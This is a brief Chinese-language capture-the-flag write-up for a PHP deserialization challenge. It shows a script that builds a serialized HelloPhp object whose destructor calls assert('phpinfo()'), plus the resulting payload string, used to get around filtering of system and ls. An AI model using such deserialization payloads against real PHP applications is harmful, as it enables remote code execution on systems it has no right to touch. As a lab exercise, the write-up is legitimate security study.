仅有一张图片,没有什么可以去操作的。F12看源码
看到最后的unserialize就知道是反序列化,先分析一下代码
1.需要我们输入data参数,之后将data参数反序列化执行,有一个类HelloPhp
2.类里面要构造两个参数a,b.并且因为析构函数会执行 echo $b($a);,这种包裹的形式可以想到用system(ls /)查看
实际上因为被过滤了system,ls,时间函数限制下只好使用
那就可以构建HelloPhp的序列化字符串,直接查看phpinfo这样data传入时反序列化就会执行析构函数
payload:
<?php
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = “phpinfo()”;
$this->b = “assert”;
}
}$a = serialize(new HelloPhp);
echo $a;
?>
放在php在线工具
结果:O:8:”HelloPhp”:2:{s:1:”a”;s:9:”phpinfo()”;s:1:”b”;s:6:”assert”;}
CTRL+f检索flag